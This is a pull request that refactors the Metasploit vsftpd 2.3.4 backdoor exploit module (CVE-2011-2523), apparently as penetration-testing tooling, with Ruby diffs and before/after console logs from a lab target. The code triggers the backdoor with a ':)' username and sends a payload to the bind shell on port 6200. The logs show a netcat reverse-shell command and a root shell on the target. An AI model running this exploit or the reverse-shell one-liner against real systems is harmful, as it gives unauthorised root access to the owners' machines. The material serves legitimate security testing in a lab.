### PR TITLE
vsftpd_234_backdoor: Port to FTP mixin

### DIFF
--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -94,7 +94,10 @@ class MetasploitModule < Msf::Exploit::Remote
     # Check for backdoor being open, else the exploit will fail
     vprint_status("Checking if backdoor has already been triggered (else exploit will fail)")
     nsock = probe_port(6200)
-    return Exploit::CheckCode::Unknown('The port used by the backdoor bind listener is already open/in-use (6200/TCP)') if nsock
+    if nsock
+      disconnect(nsock)
+      return Exploit::CheckCode::Unknown('The port used by the backdoor bind listener is already open/in-use (6200/TCP)')
+    end
 
     connect
 
@@ -132,9 +135,22 @@ class MetasploitModule < Msf::Exploit::Remote
       print_warning("The port used by the backdoor bind listener is already open. Trying...")
       begin
         handle_backdoor(nsock)
-      rescue
-        vprint_error("Someone has beat us to it, the backdoor is already in-use!")
-        raise Msf::Exploit::Failed, "Backdoor already in-use"
+        nsock = nil
+        return
+      rescue Msf::Exploit::Failed,
+             Rex::ConnectionError,
+             Rex::TimeoutError,
+             EOFError,
+             Errno::ECONNRESET,
+             Errno::EPIPE,
+             Errno::ECONNABORTED,
+             Errno::ETIMEDOUT => e
+        print_warning("Attempting to re-exploit, as existing backdoor shell probe failed with #{e.class}: #{e.message}")
+        begin
+          disconnect(nsock)
+        rescue StandardError
+          nil
+        end
       end
     end
 
@@ -146,13 +162,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if resp =~ /^530 /
       print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
-      disconnect
       return
     end
 
     if resp !~ /^331 /
       print_error("This server did not respond as expected: #{resp.strip}")
-      disconnect
       return
     end
 
@@ -165,14 +179,18 @@ class MetasploitModule < Msf::Exploit::Remote
     nsock = probe_port(6200)
     if nsock
       print_good("Backdoor has been spawned!")
+      disconnect
       handle_backdoor(nsock)
+      nsock = nil
       return
     else
       print_warning("Unable to connect to backdoor on 6200/TCP. Cooldown?")
     end
-
+  ensure
     # Finished with FTP
     disconnect
+    # Finish with backdoor
+    disconnect(nsock)
   end
 
   def handle_backdoor(s)

--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -7,7 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Auxiliary::Report
-  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Ftp
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -64,67 +64,60 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([ Opt::RPORT(21) ])
+
+    # Using randomly generated username
+    deregister_options('FTPUSER', 'FTPPASS')
   end
 
-  def get_banner
-    banner = sock.get_once(-1, 30).to_s
+  def user
+    # The key :)
+    @user ||= "#{rand_text_alphanumeric(rand(6) + 1)}:)"
+  end
 
-    vprint_status("FTP banner: #{banner.strip}")
-    version = banner[/\((.*?)\)/, 1]
-    report_service(
-      host: rhost,
-      port: rport,
-      proto: 'tcp',
-      name: 'ftp',
-      info: "#{version}"
+  def pass
+    @pass ||= rand_text_alphanumeric(rand(6) + 1)
+  end
+
+  # Raw TCP probe for backdoor
+  def probe_port(port)
+    Rex::Socket::Tcp.create(
+      'PeerHost' => rhost,
+      'PeerPort' => port,
+      'Timeout'  => 4,
+      'Context'  => { 'Msf' => framework, 'MsfExploit' => self }
     )
-
-    banner
+  rescue StandardError
+    nil
   end
 
   def check
-    # Check for backdoor first, else exploit will fail
+    # Check for backdoor being open, else the exploit will fail
     vprint_status("Checking if backdoor has already been triggered (else exploit will fail)")
-    nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil
-    if nsock
-      print_error("The port used by the backdoor bind listener is already open/in-use (6200/TCP)")
-      return Exploit::CheckCode::Unknown('Backdoor bind listener port 6200 is already open')
-    end
+    nsock = probe_port(6200)
+    return Exploit::CheckCode::Unknown('The port used by the backdoor bind listener is already open/in-use (6200/TCP)') if nsock
 
-    vprint_status("Connecting to FTP service")
     connect
 
-    vprint_status("Checking FTP banner")
-    banner = get_banner
-
     if banner.downcase.include?("vsftpd 2.3.4")
-      print_status("FTP banner hints its vulnerable: #{banner.strip}")
+      print_status("FTP banner hints its vulnerable: #{banner_version}")
     else
-      vprint_status("FTP banner: #{banner.strip}")
+      vprint_status("FTP banner: #{banner_version}")
     end
 
+    # Not using "user" as that will have :), which will start to trigger backdoor
     ftp_user = rand_text_alphanumeric(rand(6) + 1)
     vprint_status("Trying to log into FTP (User: #{ftp_user})")
-    sock.put("USER #{ftp_user}\r\n")
-    resp = sock.get_once(-1, 30).to_s
-    if resp =~ /^530 /
-      print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
-      return Exploit::CheckCode::Safe('Server configured for anonymous only, backdoor code unreachable')
-    end
-
-    if resp !~ /^331 /
-      print_error("This server did not respond as expected: #{resp.strip}")
-      return Exploit::CheckCode::Unknown("Unexpected FTP response: #{resp.strip}")
-    end
-
-    return Exploit::CheckCode::Appears('vsftpd 2.3.4 banner detected; backdoor may be present') if banner.downcase.include?("vsftpd 2.3.4") and resp =~ /^331 /
+    resp = send_user(ftp_user)
+    return Exploit::CheckCode::Safe('Server configured for anonymous only, backdoor code unreachable') if resp =~ /^530 /
+    return Exploit::CheckCode::Unknown("Unexpected FTP response: #{resp.strip}") if resp !~ /^331 /
+    return Exploit::CheckCode::Appears('VSFTPD 2.3.4 banner detected & correct response code - backdoor may be present') if resp =~ /^331 / and banner.downcase.include?("vsftpd 2.3.4")
     return Exploit::CheckCode::Unknown('Could not determine if target is vulnerable')
   ensure
     disconnect
   end
 
   def exploit
-    # Check for backdoor first, else exploit will fail
+    # Check if we have already exploited and session is currently open, else the exploit will fail
     framework.sessions.each do |sid, sess|
       next unless sess.via_exploit
       if sess.via_exploit == fullname
@@ -132,7 +125,8 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil
+    # Check for backdoor being open, else the exploit will fail
+    nsock = probe_port(6200)
     if nsock
       # Chance are, we will fail, but doesn't hurt to try
       print_warning("The port used by the backdoor bind listener is already open. Trying...")
@@ -144,18 +138,10 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    # Now connect to the FTP service
-    vprint_status("Connecting to FTP service")
     connect
 
-    # Without this, 220 response, rather than 331
-    vprint_status("Checking FTP banner")
-    banner = get_banner
-
-    ftp_user = "#{rand_text_alphanumeric(rand(6) + 1)}:)"
-    vprint_status("Trying to log into FTP via backdoor. User: #{ftp_user}")
-    sock.put("USER #{ftp_user}\r\n")
-    resp = sock.get_once(-1, 30).to_s
+    vprint_status("Trying to log into FTP via backdoor. User: #{user}")
+    resp = send_user(user)
     vprint_status(resp.strip)
 
     if resp =~ /^530 /
@@ -170,13 +156,13 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    ftp_pass = "#{rand_text_alphanumeric(rand(6) + 1)}"
-    vprint_status("Trying to log into FTP via backdoor. Password: #{ftp_pass}")
-    sock.put("PASS #{ftp_pass}\r\n")
+    vprint_status("Trying to log into FTP via backdoor. Password: #{pass}")
+    # Not bothering to read the response from password
+    sock.put("PASS #{pass}\r\n")
 
-    # Do not bother reading the response from password, just try the backdoor
-    vprint_status("Connecting to backdoor on 6200/TCP")
-    nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil
+    # Try the backdoor
+    vprint_status("Trying to connect to backdoor on 6200/TCP")
+    nsock = probe_port(6200)
     if nsock
       print_good("Backdoor has been spawned!")
       handle_backdoor(nsock)
@@ -210,6 +196,7 @@ class MetasploitModule < Msf::Exploit::Remote
       c << "\n"
       vprint_status("Running: #{c.strip}")
       s.put(c)
+      print_status('Payload sent - awaiting callback')
     end
 
     handler(s)

--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -56,9 +56,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2011-07-03',
         'DefaultTarget' => 0,
         'Notes' => {
-          'Reliability' => UNKNOWN_RELIABILITY,
-          'Stability' => UNKNOWN_STABILITY,
-          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+          'Reliability' => [UNRELIABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
         }
       )
     )

--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -96,6 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
     nsock = probe_port(6200)
     if nsock
       disconnect(nsock)
+      report_host(host: rhost)
       return Exploit::CheckCode::Unknown('The port used by the backdoor bind listener is already open/in-use (6200/TCP)')
     end
 
@@ -196,6 +197,37 @@ class MetasploitModule < Msf::Exploit::Remote
     disconnect(nsock)
   end
 
+  def report_ftp_vuln(uid_output = nil)
+    vprint_good("UID: #{uid_output}")
+
+    report_vuln(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      sname: 'ftp',
+      name: name,
+      info: uid_output ? "Backdoor triggered - #{uid_output}" : 'Backdoor triggered',
+      refs: references
+    )
+
+    report_service(
+      host: rhost,
+      port: 6200,
+      proto: 'tcp',
+      name: 'shell',
+      info: 'VSFTPD 2.3.4 backdoor bind shell'
+    )
+
+    report_note(
+      host: rhost,
+      port: 6200,
+      sname: 'shell',
+      proto: 'tcp',
+      type: 'ftp.vsftpd_backdoor',
+      data: { uid: uid_output&.strip }
+    )
+  end
+
   def handle_backdoor(socket)
     vprint_status("Trying 'id' command")
     socket.put("id\n")
@@ -209,7 +241,7 @@ class MetasploitModule < Msf::Exploit::Remote
       raise Msf::Exploit::Failed, 'Could not connect to backdoor'
     end
 
-    vprint_good("UID: #{r.strip}")
+    report_ftp_vuln(r.strip)
 
     unless payload.encoded.empty?
       c = ''

--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -24,8 +24,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author' => [
           'hdm',
           'MC',
-          'g0tmi1k'   # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
-         ],
+          'g0tmi1k' # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+        ],
         'License' => MSF_LICENSE,
         'References' => [
           [ 'CVE', '2011-2523' ],
@@ -71,11 +71,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def user
     # The key :)
-    @user ||= "#{rand_text_alphanumeric(rand(6) + 1)}:)"
+    @user ||= "#{rand_text_alphanumeric(rand(1..6))}:)"
   end
 
   def pass
-    @pass ||= rand_text_alphanumeric(rand(6) + 1)
+    @pass ||= rand_text_alphanumeric(rand(1..6))
   end
 
   # Raw TCP probe for backdoor
@@ -83,8 +83,8 @@ class MetasploitModule < Msf::Exploit::Remote
     Rex::Socket::Tcp.create(
       'PeerHost' => rhost,
       'PeerPort' => port,
-      'Timeout'  => 4,
-      'Context'  => { 'Msf' => framework, 'MsfExploit' => self }
+      'Timeout' => 4,
+      'Context' => { 'Msf' => framework, 'MsfExploit' => self }
     )
   rescue StandardError
     nil
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     # Check for backdoor being open, else the exploit will fail
-    vprint_status("Checking if backdoor has already been triggered (else exploit will fail)")
+    vprint_status('Checking if backdoor has already been triggered (else exploit will fail)')
     nsock = probe_port(6200)
     if nsock
       disconnect(nsock)
@@ -101,19 +101,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
     connect
 
-    if banner.downcase.include?("vsftpd 2.3.4")
+    if banner&.downcase&.include?('vsftpd 2.3.4')
       print_status("FTP banner hints its vulnerable: #{banner_version}")
     else
       vprint_status("FTP banner: #{banner_version}")
     end
 
     # Not using "user" as that will have :), which will start to trigger backdoor
-    ftp_user = rand_text_alphanumeric(rand(6) + 1)
+    ftp_user = rand_text_alphanumeric(rand(1..6))
     vprint_status("Trying to log into FTP (User: #{ftp_user})")
     resp = send_user(ftp_user)
     return Exploit::CheckCode::Safe('Server configured for anonymous only, backdoor code unreachable') if resp =~ /^530 /
     return Exploit::CheckCode::Unknown("Unexpected FTP response: #{resp.strip}") if resp !~ /^331 /
-    return Exploit::CheckCode::Appears('VSFTPD 2.3.4 banner detected & correct response code - backdoor may be present') if resp =~ /^331 / and banner.downcase.include?("vsftpd 2.3.4")
+    # Not every 2.3.4 is vulnerable. Only ones manually built during infection window/timeframe
+    return Exploit::CheckCode::Appears('VSFTPD 2.3.4 banner detected & correct response code - backdoor may be present') if resp =~ /^331 / && banner&.downcase&.include?('vsftpd 2.3.4')
+
     return Exploit::CheckCode::Unknown('Could not determine if target is vulnerable')
   ensure
     disconnect
@@ -123,6 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Check if we have already exploited and session is currently open, else the exploit will fail
     framework.sessions.each do |sid, sess|
       next unless sess.via_exploit
+
       if sess.via_exploit == fullname
         vprint_error("Session #{sid} is already connected to the backdoor")
       end
@@ -132,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
     nsock = probe_port(6200)
     if nsock
       # Chance are, we will fail, but doesn't hurt to try
-      print_warning("The port used by the backdoor bind listener is already open. Trying...")
+      print_warning('The port used by the backdoor bind listener is already open. Trying...')
       begin
         handle_backdoor(nsock)
         nsock = nil
@@ -161,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status(resp.strip)
 
     if resp =~ /^530 /
-      print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
+      print_error('This server is configured for anonymous only and the backdoor code cannot be reached')
       return
     end
 
@@ -175,16 +178,16 @@ class MetasploitModule < Msf::Exploit::Remote
     sock.put("PASS #{pass}\r\n")
 
     # Try the backdoor
-    vprint_status("Trying to connect to backdoor on 6200/TCP")
+    vprint_status('Trying to connect to backdoor on 6200/TCP')
     nsock = probe_port(6200)
     if nsock
-      print_good("Backdoor has been spawned!")
+      print_good('Backdoor has been spawned!')
       disconnect
       handle_backdoor(nsock)
       nsock = nil
       return
     else
-      print_warning("Unable to connect to backdoor on 6200/TCP. Cooldown?")
+      print_warning('Unable to connect to backdoor on 6200/TCP. Cooldown?')
     end
   ensure
     # Finished with FTP
@@ -193,30 +196,30 @@ class MetasploitModule < Msf::Exploit::Remote
     disconnect(nsock)
   end
 
-  def handle_backdoor(s)
+  def handle_backdoor(socket)
     vprint_status("Trying 'id' command")
-    s.put("id\n")
+    socket.put("id\n")
 
     # Wait 5 seconds and get everything
-    r = s.get_once(-1, 5).to_s
+    r = socket.get_once(-1, 5).to_s
     if r !~ /uid=/
-      print_error("The service on port 6200/TCP does not appear to be a fresh shell. Already exploited?")
+      print_error('The service on port 6200/TCP does not appear to be a fresh shell. Already exploited?')
       # Finished with the backdoor
-      disconnect(s)
+      disconnect(socket)
       raise Msf::Exploit::Failed, 'Could not connect to backdoor'
     end
 
     vprint_good("UID: #{r.strip}")
 
     unless payload.encoded.empty?
-      c = ""
+      c = ''
       c << payload.encoded
       c << "\n"
       vprint_status("Running: #{c.strip}")
-      s.put(c)
+      socket.put(c)
       print_status('Payload sent - awaiting callback')
     end
 
-    handler(s)
+    handler(socket)
   end
 end

--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -102,9 +102,9 @@ class MetasploitModule < Msf::Exploit::Remote
     connect
 
     if banner&.downcase&.include?('vsftpd 2.3.4')
-      print_status("FTP banner hints its vulnerable: #{banner_version}")
+      print_status("FTP banner hints it's vulnerable: #{banner_version}")
     else
-      vprint_status("FTP banner: #{banner_version}")
+      print_warning("FTP banner isn't giving much away: #{banner_version}")
     end
 
     # Not using "user" as that will have :), which will start to trigger backdoor
@@ -135,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
     nsock = probe_port(6200)
     if nsock
       # Chance are, we will fail, but doesn't hurt to try
-      print_warning('The port used by the backdoor bind listener is already open. Trying...')
+      print_warning('The backdoor shell port is already open. Trying...')
       begin
         handle_backdoor(nsock)
         nsock = nil

--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author' => [
           'hdm',
           'MC',
-          'g0tmi1k' # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+          'g0tmi1k' # @g0tmi1k //  additional features
         ],
         'License' => MSF_LICENSE,
         'References' => [


### PR DESCRIPTION
This PR is for:

- Use FTP mixin (auto handles report_* for FTP service)
- Update workspace more (about the backdoor service)
- (Hopefully) higher chance of success when repeating the check/exploiting
- Update metadata (notes)

```
             current  name     hosts  services  vulns  creds  loots  notes
             -------  ----     -----  --------  -----  -----  -----  -----
Before ->    *        default  1      1         1      0      0      0
After  ->    *        default  1      3         1      0      0      3
```

Target is metasploitable 2.

## Before

- Workspace is about FTP

```console
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use exploit/unix/ftp/vsftpd_234_backdoor;
set RHOSTS 10.0.0.10;
set LHOST tap0;
set PAYLOAD cmd/unix/reverse_netcat'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp
RHOSTS => 10.0.0.10
LHOST => tap0
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(unix/ftp/vsftpd_234_backdoor) > run
[+] mkfifo /tmp/fygwefm; nc 10.0.0.1 4444 0</tmp/fygwefm | /bin/sh >/tmp/fygwefm 2>&1; rm /tmp/fygwefm
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.0.0.10:21 - Checking if backdoor has already been triggered (else exploit will fail)
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - FTP banner hints its vulnerable: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP (User: osgsV)
[+] 10.0.0.10:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected; backdoor may be present
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. User: yQ:)
[*] 10.0.0.10:21 - 331 Please specify the password.
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. Password: K9
[*] 10.0.0.10:21 - Connecting to backdoor on 6200/TCP
[+] 10.0.0.10:21 - Backdoor has been spawned!
[*] 10.0.0.10:21 - Trying 'id' command
[+] 10.0.0.10:21 - UID: uid=0(root) gid=0(root)
[*] 10.0.0.10:21 - Running: mkfifo /tmp/weohinf; nc 10.0.0.1 4444 0</tmp/weohinf | /bin/sh >/tmp/weohinf 2>&1; rm /tmp/weohinf
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:49476) at 2026-05-21 10:27:29 +0100

id
uid=0(root) gid=0(root)
^Z
Background session 1? [y/N]  y
msf exploit(unix/ftp/vsftpd_234_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      0      0      0

msf exploit(unix/ftp/vsftpd_234_backdoor) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             Unknown                    device

msf exploit(unix/ftp/vsftpd_234_backdoor) > services
Services
========

host       port  proto  name  state  info          resource  parents
----       ----  -----  ----  -----  ----          --------  -------
10.0.0.10  21    tcp    ftp   open   vsFTPd 2.3.4  {}

msf exploit(unix/ftp/vsftpd_234_backdoor) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                                  References
---------                ----       -------       --------  ----                                  ----------
2026-05-21 09:27:22 UTC  10.0.0.10  ftp (21/tcp)  {}        exploit/unix/ftp/vsftpd_234_backdoor  CVE-2011-2523,OSVDB-73573,URL-http://pastebin.com/AetT9sS5,URL-http://scarybeastsecurity.blogspot.com/2011/0
                                                                                                  7/alert-vsftpd-download-backdoored.html

msf exploit(unix/ftp/vsftpd_234_backdoor) >
```

## After

- Workspace is richer

```console
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use exploit/unix/ftp/vsftpd_234_backdoor;
set RHOSTS 10.0.0.10;
set LHOST tap0;
set PAYLOAD cmd/unix/reverse_netcat'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp
RHOSTS => 10.0.0.10
LHOST => tap0
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(unix/ftp/vsftpd_234_backdoor) > run
[+] mkfifo /tmp/tvylewx; nc 10.0.0.1 4444 0</tmp/tvylewx | /bin/sh >/tmp/tvylewx 2>&1; rm /tmp/tvylewx
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.0.0.10:21 - Checking if backdoor has already been triggered (else exploit will fail)
[*] 10.0.0.10:21 - Connecting to FTP server...
[*] 10.0.0.10:21 - Connected to target FTP server
[*] 10.0.0.10:21 - FTP banner hints it's vulnerable: vsFTPd 2.3.4
[*] 10.0.0.10:21 - Trying to log into FTP (User: eXv)
[+] 10.0.0.10:21 - The target appears to be vulnerable. VSFTPD 2.3.4 banner detected & correct response code - backdoor may be present
[*] 10.0.0.10:21 - Connecting to FTP server...
[*] 10.0.0.10:21 - Connected to target FTP server
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. User: cpRtk:)
[*] 10.0.0.10:21 - 331 Please specify the password.
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. Password: v
[*] 10.0.0.10:21 - Trying to connect to backdoor on 6200/TCP
[+] 10.0.0.10:21 - Backdoor has been spawned!
[*] 10.0.0.10:21 - Trying 'id' command
[+] 10.0.0.10:21 - UID: uid=0(root) gid=0(root)
[*] 10.0.0.10:21 - Running: mkfifo /tmp/hcbmk; nc 10.0.0.1 4444 0</tmp/hcbmk | /bin/sh >/tmp/hcbmk 2>&1; rm /tmp/hcbmk
[*] 10.0.0.10:21 - Payload sent — awaiting callback
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:49470) at 2026-05-21 10:25:49 +0100

id
uid=0(root) gid=0(root)
^Z
Background session 1? [y/N]  y
msf exploit(unix/ftp/vsftpd_234_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      3         1      0      0      3

msf exploit(unix/ftp/vsftpd_234_backdoor) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             Unknown                    device

msf exploit(unix/ftp/vsftpd_234_backdoor) > services
Services
========

host       port  proto  name   state  info                              resource  parents
----       ----  -----  ----   -----  ----                              --------  -------
10.0.0.10  21    tcp    ftp    open   vsFTPd 2.3.4                      {}        tcp (21/tcp)
10.0.0.10  21    tcp    tcp    open                                     {}
10.0.0.10  6200  tcp    shell  open   VSFTPD 2.3.4 backdoor bind shell  {}

msf exploit(unix/ftp/vsftpd_234_backdoor) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                                  References
---------                ----       -------       --------  ----                                  ----------
2026-05-21 09:25:42 UTC  10.0.0.10  ftp (21/tcp)  {}        exploit/unix/ftp/vsftpd_234_backdoor  CVE-2011-2523,OSVDB-73573,URL-http://pastebin.com/AetT9sS5,URL-http://scarybeastsecurity.blogspot.com/2011/0
                                                                                                  7/alert-vsftpd-download-backdoored.html

msf exploit(unix/ftp/vsftpd_234_backdoor) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type                 Data
 ----                     ----       -------  ----  --------  ----                 ----
 2026-05-21 09:25:42 UTC  10.0.0.10  ftp      21    tcp       ftp.banner           {:banner=>"220 (vsFTPd 2.3.4)"}
 2026-05-21 09:25:42 UTC  10.0.0.10  ftp      21    tcp       ftp.cpe              {:cpe=>"cpe:/a:vsftpd_project:vsftpd:2.3.4"}
 2026-05-21 09:25:42 UTC  10.0.0.10  shell    6200  tcp       ftp.vsftpd_backdoor  {:uid=>"uid=0(root) gid=0(root)"}

msf exploit(unix/ftp/vsftpd_234_backdoor) >
```